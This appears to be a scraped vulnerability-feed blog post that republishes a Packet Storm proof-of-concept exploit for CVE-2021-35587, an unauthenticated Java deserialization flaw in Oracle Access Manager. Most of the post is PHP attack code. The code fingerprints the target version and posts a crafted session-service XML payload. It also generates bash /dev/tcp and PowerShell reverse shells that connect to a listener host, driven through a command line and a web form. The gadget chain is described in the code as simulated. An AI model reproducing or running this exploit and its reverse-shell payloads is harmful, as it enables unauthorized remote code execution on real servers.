{"id":40108,"date":"2026-02-10T13:49:50","date_gmt":"2026-02-10T13:49:50","guid":{"rendered":"http:\/\/localhost\/?p=40108"},"modified":"2026-02-10T13:49:50","modified_gmt":"2026-02-10T13:49:50","slug":"oracle-access-manager-122140-insecure-deserialization","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=40108","title":{"rendered":"\ud83d\udcc4 Oracle Access Manager 12.2.1.4.0 Insecure Deserialization_PACKETSTORM:215250"},"content":{"rendered":"

{“lastseen”:”2026-02-10T19:01:58″,”description”:”Proof of concept exploit for an unauthenticated Java deserialization vulnerability in the OpenSSO Agent component of Oracle Access Manager that allows remote attackers to execute arbitrary commands without authentication. The vulnerability exists in…”,”published”:”2026-02-10T00:00:00″,”modified”:”2026-02-10T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Oracle Access Manager 12.2.1.4.0 Insecure Deserialization”,”source”:””,”references”:””,”id”:”PACKETSTORM:215250″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2021-35587″],”sourceData”:”=============================================================================================================================================\\n | # Title : Oracle Access Manager 12.2.1.4.0 Java deserialization vulnerability |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.1 (64 bits) |\\n | # Vendor : https:\/\/www.oracle.com\/ |\\n =============================================================================================================================================\\n \\n \\n [+] Summary : https:\/\/packetstorm.news\/files\/id\/190368\/ \\u0026 \\tCVE-2021-35587 \\n \\n an unauthenticated Java deserialization vulnerability in the OpenSSO Agent component of Oracle Access Manager that allows remote attackers to execute arbitrary commands without authentication.\\n \\t\\t The vulnerability exists in the session handling mechanism of the OpenSSO Agent, which improperly deserializes untrusted data from unauthenticated requests.\\n \\t \\n [+] POC : \\n \\n php poc.php\\n \\n \\n \\u003c?php\\n \\n class OracleAccessManagerExploit {\\n private $target;\\n private $port;\\n private $ssl;\\n private $base_path;\\n private $timeout;\\n \\n public function __construct($target, $port = 14100, $ssl = false, $base_path = ‘\/oam\/’) {\\n $this-\\u003etarget = $target;\\n $this-\\u003eport = $port;\\n $this-\\u003essl = $ssl;\\n $this-\\u003ebase_path = rtrim($base_path, ‘\/’);\\n $this-\\u003etimeout = 30;\\n }\\n \\n \/**\\n * Check if target is vulnerable to CVE-2021-35587\\n *\/\\n public function check() {\\n echo \\”[*] Checking Oracle Access Manager vulnerability (CVE-2021-35587)…\\\\n\\”;\\n \\n try {\\n $version = $this-\\u003eget_version();\\n \\n if ($version) {\\n echo \\”[*] Detected Oracle Access Manager version: {$version}\\\\n\\”;\\n \\n $affected_versions = [\\n ‘11.1.2.3.0’,\\n ‘12.2.1.3.0’, \\n ‘12.2.1.4.0’\\n ];\\n \\n if (in_array($version, $affected_versions)) {\\n echo \\”[+] \u2713 Target appears to be vulnerable!\\\\n\\”;\\n return \\”vulnerable\\”;\\n } else {\\n echo \\”[-] \u2717 Target is not vulnerable (version not affected)\\\\n\\”;\\n return \\”safe\\”;\\n }\\n } else {\\n echo \\”[?] Target appears to be OAM but version could not be determined\\\\n\\”;\\n return \\”detected\\”;\\n }\\n \\n } catch (Exception $e) {\\n echo \\”[-] Check failed: \\” . $e-\\u003egetMessage() . \\”\\\\n\\”;\\n return \\”unknown\\”;\\n }\\n }\\n \\n \/**\\n * Execute the exploit\\n *\/\\n public function exploit($payload) {\\n echo \\”[*] Starting Oracle Access Manager RCE exploit…\\\\n\\”;\\n \\n try {\\n \/\/ Get target version for appropriate gadget chain\\n $version = $this-\\u003eget_version();\\n echo \\”[*] Target version: {$version}\\\\n\\”;\\n \\n \/\/ Generate exploit XML\\n $xml_data = $this-\\u003egenerate_exploit_xml($version, $payload);\\n \\n \/\/ Send exploit request\\n $response = $this-\\u003esend_exploit_request($xml_data);\\n \\n if ($response \\u0026\\u0026 strpos($response, ‘200’) !== false) {\\n echo \\”[+] \u2713 Exploit sent successfully\\\\n\\”;\\n return true;\\n } else {\\n echo \\”[-] \u2717 Exploit failed – no response or unexpected status\\\\n\\”;\\n return false;\\n }\\n \\n } catch (Exception $e) {\\n echo \\”[-] Exploit failed: \\” . $e-\\u003egetMessage() . \\”\\\\n\\”;\\n return false;\\n }\\n }\\n \\n \/**\\n * Get Oracle Access Manager version\\n *\/\\n private function get_version() {\\n $url = $this-\\u003ebuild_url(‘\/pages\/impconsent.jsp’);\\n \\n $ch = curl_init();\\n curl_setopt_array($ch, [\\n CURLOPT_URL =\\u003e $url,\\n CURLOPT_RETURNTRANSFER =\\u003e true,\\n CURLOPT_TIMEOUT =\\u003e $this-\\u003etimeout,\\n CURLOPT_SSL_VERIFYPEER =\\u003e false,\\n CURLOPT_SSL_VERIFYHOST =\\u003e false,\\n CURLOPT_FOLLOWLOCATION =\\u003e true,\\n CURLOPT_USERAGENT =\\u003e ‘Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36’\\n ]);\\n \\n $response = curl_exec($ch);\\n $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);\\n curl_close($ch);\\n \\n if ($http_code !== 200) {\\n throw new Exception(\\”HTTP {$http_code} received\\”);\\n }\\n \\n \/\/ Check for Oracle-specific headers\\n if (strpos($response, ‘Oracle Access Management Version:’) === false) {\\n throw new Exception(\\”Not an Oracle Access Manager endpoint\\”);\\n }\\n \\n \/\/ Extract version from response\\n if (preg_match(‘\/Oracle Access Management Version: (\\\\d+\\\\.\\\\d+\\\\.\\\\d+\\\\.\\\\d+\\\\.\\\\d+)\/’, $response, $matches)) {\\n return $matches[1];\\n }\\n \\n return null;\\n }\\n \\n \/**\\n * Generate exploit XML with gadget chain\\n *\/\\n private function generate_exploit_xml($version, $payload) {\\n echo \\”[*] Generating exploit XML for version {$version}…\\\\n\\”;\\n \\n \/\/ Get appropriate gadget chain\\n $gadget = $this-\\u003eget_gadget_chain($version, $payload);\\n \\n \/\/ Encode gadget\\n $gadget_b64 = base64_encode($gadget);\\n $requester_b64 = base64_encode(\\”object:{$gadget_b64}\\”);\\n \\n \/\/ Generate random IDs\\n $reqid = $this-\\u003erandom_string(rand(8, 32));\\n $session_id = $this-\\u003erandom_string(rand(8, 32));\\n $request_reqid = $this-\\u003erandom_string(rand(8, 32));\\n $vers = $this-\\u003erandom_string(rand(8, 32));\\n $dtdid = $this-\\u003erandom_string(rand(8, 32));\\n $sid = $this-\\u003erandom_string(rand(8, 32));\\n \\n \/\/ Build XML\\n $xml = ‘\\u003c?xml version=\\”1.0\\” encoding=\\”UTF-8\\”?\\u003e’ . \\”\\\\n\\”;\\n $xml .= \\”\\u003cRequestSet svcid=\\\\\\”session\\\\\\” reqid=\\\\\\”{$request_reqid}\\\\\\” vers=\\\\\\”{$vers}\\\\\\”\\u003e\\\\n\\”;\\n $xml .= \\” \\u003cRequest dtdid=\\\\\\”{$dtdid}\\\\\\” sid=\\\\\\”{$sid}\\\\\\”\\u003e\\\\n\\”;\\n $xml .= \\” \\u003c![CDATA[\\\\n\\”;\\n $xml .= \\” \\u003cauthIdentifier reqid=\\\\\\”{$reqid}\\\\\\” requester=\\\\\\”{$requester_b64}\\\\\\”\\u003e\\\\n\\”;\\n $xml .= \\” \\u003cSessionID\\u003e{$session_id}\\u003c\/SessionID\\u003e\\\\n\\”;\\n $xml .= \\” \\u003c\/authIdentifier\\u003e\\\\n\\”;\\n $xml .= \\” ]]\\u003e\\\\n\\”;\\n $xml .= \\” \\u003c\/Request\\u003e\\\\n\\”;\\n $xml .= \\”\\u003c\/RequestSet\\u003e\\”;\\n \\n echo \\”[*] Generated exploit XML\\\\n\\”;\\n return $xml;\\n }\\n \\n \/**\\n * Get appropriate gadget chain for version\\n *\/\\n private function get_gadget_chain($version, $payload) {\\n $gadget_file = null;\\n \\n switch ($version) {\\n case ‘12.2.1.4.0’:\\n $gadget_file = ‘gadget_12.2.1.4.0.bin’;\\n break;\\n case ‘12.2.1.3.0’:\\n $gadget_file = ‘gadget_12.2.1.3.0.bin’;\\n break;\\n default:\\n throw new Exception(\\”Unsupported version: {$version}\\”);\\n }\\n \\n echo \\”[*] Using gadget chain: {$gadget_file}\\\\n\\”;\\n \\n \/\/ In real scenario, load from file\\n \/\/ For demo, create a simulated gadget\\n $gadget = $this-\\u003ecreate_simulated_gadget($payload);\\n \\n return $gadget;\\n }\\n \\n \/**\\n * Create simulated gadget chain (for demonstration)\\n *\/\\n private function create_simulated_gadget($payload) {\\n \/\/ This simulates a Java deserialization gadget chain\\n \/\/ In reality, this would be a complex serialized Java object\\n \\n $gadget = \\”aced0005737200\\”; \/\/ Java serialization magic header\\n \\n \/\/ Add command execution parameters\\n $shell_name = $this-\\u003eis_windows_target() ? ‘cmd.exe’ : ‘\/bin\/sh’;\\n $shell_arg = $this-\\u003eis_windows_target() ? ‘\/C’ : ‘-c’;\\n \\n \/\/ Simulate gadget structure with placeholders\\n $gadget .= bin2hex(pack(‘n’, strlen(‘EXEC_ARG0’)) . ‘EXEC_ARG0’);\\n $gadget .= bin2hex(pack(‘n’, strlen($shell_name)) . $shell_name);\\n \\n $gadget .= bin2hex(pack(‘n’, strlen(‘EXEC_ARG1’)) . ‘EXEC_ARG1’);\\n $gadget .= bin2hex(pack(‘n’, strlen($shell_arg)) . $shell_arg);\\n \\n $gadget .= bin2hex(pack(‘n’, strlen(‘EXEC_ARG2’)) . ‘EXEC_ARG2’);\\n $gadget .= bin2hex(pack(‘n’, strlen($payload)) . $payload);\\n \\n \/\/ Add more serialized data…\\n $gadget .= \\”7372002a636f6d2e73756e2e726f7773657474\\”; \/\/ More simulated data\\n \\n return hex2bin($gadget);\\n }\\n \\n \/**\\n * Send exploit request\\n *\/\\n private function send_exploit_request($xml_data) {\\n $url = $this-\\u003ebuild_url(‘\/server\/opensso\/sessionservice’);\\n \\n $ch = curl_init();\\n curl_setopt_array($ch, [\\n CURLOPT_URL =\\u003e $url,\\n CURLOPT_POST =\\u003e true,\\n CURLOPT_POSTFIELDS =\\u003e $xml_data,\\n CURLOPT_RETURNTRANSFER =\\u003e true,\\n CURLOPT_TIMEOUT =\\u003e $this-\\u003etimeout,\\n CURLOPT_SSL_VERIFYPEER =\\u003e false,\\n CURLOPT_SSL_VERIFYHOST =\\u003e false,\\n CURLOPT_HTTPHEADER =\\u003e [\\n ‘Content-Type: text\/xml’,\\n ‘User-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36’\\n ]\\n ]);\\n \\n $response = curl_exec($ch);\\n $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);\\n curl_close($ch);\\n \\n echo \\”[*] Sent exploit request, HTTP status: {$http_code}\\\\n\\”;\\n \\n return $response;\\n }\\n \\n \/**\\n * Build full URL\\n *\/\\n private function build_url($path) {\\n $protocol = $this-\\u003essl ? ‘https’ : ‘http’;\\n $full_path = $this-\\u003ebase_path . $path;\\n return \\”{$protocol}:\/\/{$this-\\u003etarget}:{$this-\\u003eport}{$full_path}\\”;\\n }\\n \\n \/**\\n * Check if target is Windows\\n *\/\\n private function is_windows_target() {\\n \/\/ This would be determined from target info\\n \/\/ For demo, assume Linux\/Unix\\n return false;\\n }\\n \\n \/**\\n * Generate random string\\n *\/\\n private function random_string($length = 10) {\\n $chars = ‘abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789’;\\n $str = ”;\\n for ($i = 0; $i \\u003c $length; $i++) {\\n $str .= $chars[rand(0, strlen($chars) – 1)];\\n }\\n return $str;\\n }\\n \\n \/**\\n * Generate payload based on target\\n *\/\\n public function generate_payload($type = ‘reverse_shell’, $lhost = null, $lport = null) {\\n if ($this-\\u003eis_windows_target()) {\\n return $this-\\u003egenerate_windows_payload($type, $lhost, $lport);\\n } else {\\n return $this-\\u003egenerate_linux_payload($type, $lhost, $lport);\\n }\\n }\\n \\n private function generate_linux_payload($type, $lhost, $lport) {\\n switch ($type) {\\n case ‘reverse_shell’:\\n return \\”\/bin\/bash -c ‘bash -i \\u003e\\u0026 \/dev\/tcp\/{$lhost}\/{$lport} 0\\u003e\\u00261’\\”;\\n case ‘command’:\\n return ‘id; whoami; uname -a’;\\n default:\\n return ‘echo \\”Test command executed\\”‘;\\n }\\n }\\n \\n private function generate_windows_payload($type, $lhost, $lport) {\\n switch ($type) {\\n case ‘reverse_shell’:\\n return \\”powershell -nop -c \\\\\\”\\\\$tc=New-Object System.Net.Sockets.TCPClient(‘{$lhost}’,{$lport});\\\\$ns=\\\\$tc.GetStream();[byte[]]\\\\$bt=0..65535|%{0};while((\\\\$i=\\\\$ns.Read(\\\\$bt,0,\\\\$bt.Length)) -ne 0){;\\\\$d=(New-Object Text.ASCIIEncoding).GetString(\\\\$bt,0,\\\\$i);\\\\$sb=(iex \\\\$d 2\\u003e\\u00261|Out-String);\\\\$s2=\\\\$sb+’PS ‘+(pwd).Path+’\\u003e ‘;\\\\$sb2=([text.encoding]::ASCII).GetBytes(\\\\$s2);\\\\$ns.Write(\\\\$sb2,0,\\\\$sb2.Length);\\\\$ns.Flush()};\\\\$tc.Close()\\\\\\”\\”;\\n case ‘command’:\\n return ‘whoami \\u0026 systeminfo’;\\n default:\\n return ‘echo Test command executed’;\\n }\\n }\\n }\\n \\n \/\/ Command line interface\\n if (php_sapi_name() === ‘cli’) {\\n echo \\”\\n \u2588\u2588\u2557\u2588\u2588\u2588\u2557 \u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2557 \u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2557 \u2588\u2588\u2557\u2588\u2588\u2557 \u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2557 \\n \u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2554\u255d\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\\n \u2588\u2588\u2551\u2588\u2588\u2554\u2588\u2588\u2557 \u2588\u2588\u2551\u2588\u2588 \u2588\u2554\u255d\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2554\u255d \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\\n \u2588\u2588\u2551\u2588\u2588\u2551\u255a\u2588\u2588\u2557\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\u255a\u2550\u2550\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2588\u2588\u2557 \u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2551\\n \u2588\u2588\u2551\u2588\u2588\u2551 \u255a\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2557\u2588\u2588\u2551 \u2588\u2588\u2551\\n \u255a\u2550\u255d\u255a\u2550\u255d \u255a\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u255d \u255a\u2550\u255d\u255a\u2550\u255d \u255a\u2550\u255d\u255a\u2550\u255d \u255a\u2550\u255d\\n \\n Oracle Access Manager Deserialization Vulnerability PHP Implementation\\n \\n \\\\n\\”;\\n \\n $options = getopt(\\”t:p:s:u:c:P:L:H:\\”, [\\n \\”target:\\”,\\n \\”port:\\”,\\n \\”ssl\\”,\\n \\”uri:\\”,\\n \\”check\\”,\\n \\”payload:\\”,\\n \\”lhost:\\”,\\n \\”lport:\\”\\n ]);\\n \\n $target = $options[‘t’] ?? $options[‘target’] ?? null;\\n $port = $options[‘p’] ?? $options[‘port’] ?? 14100;\\n $ssl = isset($options[‘s’]) || isset($options[‘ssl’]);\\n $base_uri = $options[‘u’] ?? $options[‘uri’] ?? ‘\/oam\/’;\\n $check_only = isset($options[‘c’]) || isset($options[‘check’]);\\n $payload_type = $options[‘P’] ?? $options[‘payload’] ?? ‘command’;\\n $lhost = $options[‘H’] ?? $options[‘lhost’] ?? ‘192.168.1.100’;\\n $lport = $options[‘L’] ?? $options[‘lport’] ?? 4444;\\n \\n if (!$target) {\\n echo \\”Usage: php oracle_exploit.php [options]\\\\n\\”;\\n echo \\”Options:\\\\n\\”;\\n echo \\” -t, –target Target host (required)\\\\n\\”;\\n echo \\” -p, –port Target port (default: 14100)\\\\n\\”;\\n echo \\” -s, –ssl Use SSL (default: false)\\\\n\\”;\\n echo \\” -u, –uri Base URI path (default: \/oam\/)\\\\n\\”;\\n echo \\” -c, –check Check only (don’t exploit)\\\\n\\”;\\n echo \\” -P, –payload Payload type: command, reverse_shell (default: command)\\\\n\\”;\\n echo \\” -H, –lhost Listener host for reverse shell\\\\n\\”;\\n echo \\” -L, –lport Listener port for reverse shell\\\\n\\”;\\n echo \\”\\\\nExamples:\\\\n\\”;\\n echo \\” php oracle_exploit.php -t 192.168.1.100 -c\\\\n\\”;\\n echo \\” php oracle_exploit.php -t oracle-server.com -p 1443 -s -P reverse_shell -H 10.0.0.5 -L 4444\\\\n\\”;\\n exit(1);\\n }\\n \\n $exploit = new OracleAccessManagerExploit($target, $port, $ssl, $base_uri);\\n \\n if ($check_only) {\\n $result = $exploit-\\u003echeck();\\n echo \\”\\\\n[*] Result: {$result}\\\\n\\”;\\n } else {\\n $payload = $exploit-\\u003egenerate_payload($payload_type, $lhost, $lport);\\n echo \\”[*] Using payload: {$payload}\\\\n\\”;\\n \\n if ($exploit-\\u003eexploit($payload)) {\\n echo \\”[+] Exploitation completed\\\\n\\”;\\n } else {\\n echo \\”[-] Exploitation failed\\\\n\\”;\\n }\\n }\\n \\n } else {\\n \/\/ Web interface\\n if ($_POST[‘action’] == ‘check’ || $_POST[‘action’] == ‘exploit’) {\\n $target = $_POST[‘target’] ?? ”;\\n $port = $_POST[‘port’] ?? 14100;\\n $ssl = isset($_POST[‘ssl’]);\\n $base_uri = $_POST[‘uri’] ?? ‘\/oam\/’;\\n $payload_type = $_POST[‘payload_type’] ?? ‘command’;\\n $lhost = $_POST[‘lhost’] ?? ”;\\n $lport = $_POST[‘lport’] ?? 4444;\\n \\n if ($target) {\\n $exploit = new OracleAccessManagerExploit($target, $port, $ssl, $base_uri);\\n \\n ob_start();\\n if ($_POST[‘action’] == ‘check’) {\\n $exploit-\\u003echeck();\\n } else {\\n $payload = $exploit-\\u003egenerate_payload($payload_type, $lhost, $lport);\\n echo \\”[*] Using payload: {$payload}\\\\n\\”;\\n $exploit-\\u003eexploit($payload);\\n }\\n $output = ob_get_clean();\\n \\n echo \\”\\u003cpre\\u003e$output\\u003c\/pre\\u003e\\”;\\n } else {\\n echo \\”\\u003cdiv style=’color: red;’\\u003eTarget host is required\\u003c\/div\\u003e\\”;\\n }\\n } else {\\n echo ‘\\u003c!DOCTYPE html\\u003e\\n \\u003chtml\\u003e\\n \\u003chead\\u003e\\n \\u003ctitle\\u003eOracle Access Manager RCE Exploit\\u003c\/title\\u003e\\n \\u003cstyle\\u003e\\n body { font-family: Arial, sans-serif; margin: 40px; }\\n .container { max-width: 800px; margin: 0 auto; }\\n .form-group { margin-bottom: 15px; }\\n label { display: block; margin-bottom: 5px; font-weight: bold; }\\n input[type=\\”text\\”] { \\n width: 100%; padding: 8px; border: 1px solid #ddd; border-radius: 4px; \\n }\\n button { \\n background: #007cba; color: white; padding: 10px 20px; \\n border: none; border-radius: 4px; cursor: pointer; margin-right: 10px;\\n }\\n .danger { background: #dc3545; }\\n .info { background: #17a2b8; }\\n \\u003c\/style\\u003e\\n \\u003c\/head\\u003e\\n \\u003cbody\\u003e\\n \\u003cdiv class=\\”container\\”\\u003e\\n \\u003ch1\\u003eOracle Access Manager Unauthenticated RCE\\u003c\/h1\\u003e\\n \\u003ch3\\u003eCVE-2021-35587 – Deserialization Vulnerability\\u003c\/h3\\u003e\\n \\n \\u003cform method=\\”post\\”\\u003e\\n \\u003cdiv class=\\”form-group\\”\\u003e\\n \\u003clabel for=\\”target\\”\\u003eTarget Host:\\u003c\/label\\u003e\\n \\u003cinput type=\\”text\\” id=\\”target\\” name=\\”target\\” placeholder=\\”192.168.1.100\\” required\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cdiv class=\\”form-group\\”\\u003e\\n \\u003clabel for=\\”port\\”\\u003ePort:\\u003c\/label\\u003e\\n \\u003cinput type=\\”text\\” id=\\”port\\” name=\\”port\\” value=\\”14100\\”\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cdiv class=\\”form-group\\”\\u003e\\n \\u003clabel for=\\”uri\\”\\u003eBase URI:\\u003c\/label\\u003e\\n \\u003cinput type=\\”text\\” id=\\”uri\\” name=\\”uri\\” value=\\”\/oam\/\\”\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cdiv class=\\”form-group\\”\\u003e\\n \\u003clabel\\u003e\\n \\u003cinput type=\\”checkbox\\” name=\\”ssl\\”\\u003e Use SSL\\n \\u003c\/label\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cdiv class=\\”form-group\\”\\u003e\\n \\u003clabel for=\\”payload_type\\”\\u003ePayload Type:\\u003c\/label\\u003e\\n \\u003cselect id=\\”payload_type\\” name=\\”payload_type\\”\\u003e\\n \\u003coption value=\\”command\\”\\u003eTest Command\\u003c\/option\\u003e\\n \\u003coption value=\\”reverse_shell\\”\\u003eReverse Shell\\u003c\/option\\u003e\\n \\u003c\/select\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cdiv class=\\”form-group\\”\\u003e\\n \\u003clabel for=\\”lhost\\”\\u003eListener Host (for reverse shell):\\u003c\/label\\u003e\\n \\u003cinput type=\\”text\\” id=\\”lhost\\” name=\\”lhost\\” placeholder=\\”192.168.1.100\\”\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cdiv class=\\”form-group\\”\\u003e\\n \\u003clabel for=\\”lport\\”\\u003eListener Port (for reverse shell):\\u003c\/label\\u003e\\n \\u003cinput type=\\”text\\” id=\\”lport\\” name=\\”lport\\” value=\\”4444\\”\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cbutton type=\\”submit\\” name=\\”action\\” value=\\”check\\” class=\\”info\\”\\u003eCheck Vulnerability\\u003c\/button\\u003e\\n \\u003cbutton type=\\”submit\\” name=\\”action\\” value=\\”exploit\\” class=\\”danger\\”\\u003eExecute Exploit\\u003c\/button\\u003e\\n \\u003c\/form\\u003e\\n \\n \\u003cdiv style=\\”margin-top: 30px; padding: 15px; background: #f8f9fa; border-radius: 4px;\\”\\u003e\\n \\u003ch3\\u003eAbout CVE-2021-35587:\\u003c\/h3\\u003e\\n \\u003cp\\u003e\\u003cstrong\\u003eVulnerability:\\u003c\/strong\\u003e Unauthenticated Java deserialization in OpenSSO Agent\\u003c\/p\\u003e\\n \\u003cp\\u003e\\u003cstrong\\u003eAffected Versions:\\u003c\/strong\\u003e 11.1.2.3.0, 12.2.1.3.0, 12.2.1.4.0\\u003c\/p\\u003e\\n \\u003cp\\u003e\\u003cstrong\\u003eImpact:\\u003c\/strong\\u003e Remote Code Execution without authentication\\u003c\/p\\u003e\\n \\u003cp\\u003e\\u003cstrong\\u003ePort:\\u003c\/strong\\u003e Typically 14100 (HTTP) or 1443 (HTTPS)\\u003c\/p\\u003e\\n \\u003c\/div\\u003e\\n \\u003c\/div\\u003e\\n \\u003c\/body\\u003e\\n \\u003c\/html\\u003e’;\\n }\\n }\\n ?\\u003e\\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/215250″,”cvss”:{“score”:9.8,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/215250\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2026-02-10T19:01:58″,”description”:”Proof of concept exploit for an unauthenticated Java deserialization vulnerability in the OpenSSO Agent component of Oracle Access Manager that allows remote attackers to execute…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,13,53,7,11,5],"class_list":["post-40108","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 Oracle Access Manager 12.2.1.4.0 Insecure Deserialization_PACKETSTORM:215250 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=40108\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Oracle Access Manager 12.2.1.4.0 Insecure Deserialization_PACKETSTORM:215250 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2026-02-10T19:01:58″,”description”:”Proof of concept exploit for an unauthenticated Java deserialization vulnerability in the OpenSSO Agent component of Oracle Access Manager that allows remote attackers to execute...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=40108\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-02-10T13:49:50+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"14 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40108#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40108\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Oracle Access Manager 12.2.1.4.0 Insecure Deserialization_PACKETSTORM:215250\",\"datePublished\":\"2026-02-10T13:49:50+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40108\"},\"wordCount\":2820,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.8\",\"exploit\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=40108#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40108\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40108\",\"name\":\"\ud83d\udcc4 Oracle Access Manager 12.2.1.4.0 Insecure Deserialization_PACKETSTORM:215250 - zero 